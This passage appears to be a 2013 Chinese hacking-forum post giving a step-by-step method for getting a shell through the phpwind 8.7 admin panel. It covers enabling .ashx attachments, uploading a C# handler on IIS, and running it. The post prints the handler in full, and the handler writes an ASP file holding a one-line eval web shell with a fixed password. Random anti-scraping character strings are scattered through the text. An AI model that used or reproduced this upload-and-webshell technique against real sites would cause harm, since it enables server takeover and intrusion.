找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2219|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
6 |4 |" c9 x2 L! l9 Y
9 s% J1 n8 |8 b7 ?1 s群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx! S1 }! c1 }- E1 K3 P' H& k+ v3 m& S

3 t5 W) M" y! T. g0 M3 n- A发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整5 x2 h: E3 [2 @7 O! L

( s, v4 j( f6 D& b然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
: ], f! H( n) Q8 \  X9 D3 @1 z9 [ / @. D; r/ C. w: p; |
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
+ q  E, ^/ L# s& U  q1 V
/ r9 W$ |. w* _/ i6 n# x下面是代码:
+ c0 ~; }: `) A1 _ , x& d: J4 j  X4 e
<%@ WebHandler Language="C#"Class="Handler" %>
$ H* B" w* b3 U8 b! s6 Y: O& Iusing System;$ p0 R( w. ?" G) ~$ H0 U
using System.Web;  g9 z* {( V8 a9 G; n7 V
using System.IO;
: D4 x1 B$ G; r4 `$ zpublic class Handler : IHttpHandler {/ c3 w3 I, \8 q/ c0 g; a& N9 c
public void ProcessRequest (HttpContext context) {" X7 ~8 L2 _2 E
context.Response.ContentType = "text/plain";0 G* h8 g4 i" w( x1 I
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
9 j8 N% a& B8 r- Z- d% w5 f  X1 v9 Ufile1.Write("<%eval request(\"r00ts\")%>");
4 x- F, t8 H* N$ dfile1.Flush();
+ `$ B$ g' q% }3 {9 @file1.Close();
% d0 e# q$ Y# O+ E. _; m}+ ~( k; ]) W  E) m
public bool IsReusable {
7 F& n% }; {: g+ F, L" g! wget {
' b: D2 q) L5 s; V6 ]7 w; ]1 }return false;! C# k8 ~! t# j* g! ?* g8 F! \. M+ N
}
/ X9 s! }/ f, g, i0 g}
, A% V: k8 I! t9 u# j/ ~}
! @. x/ ?* D, U2 J9 r9 X. Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表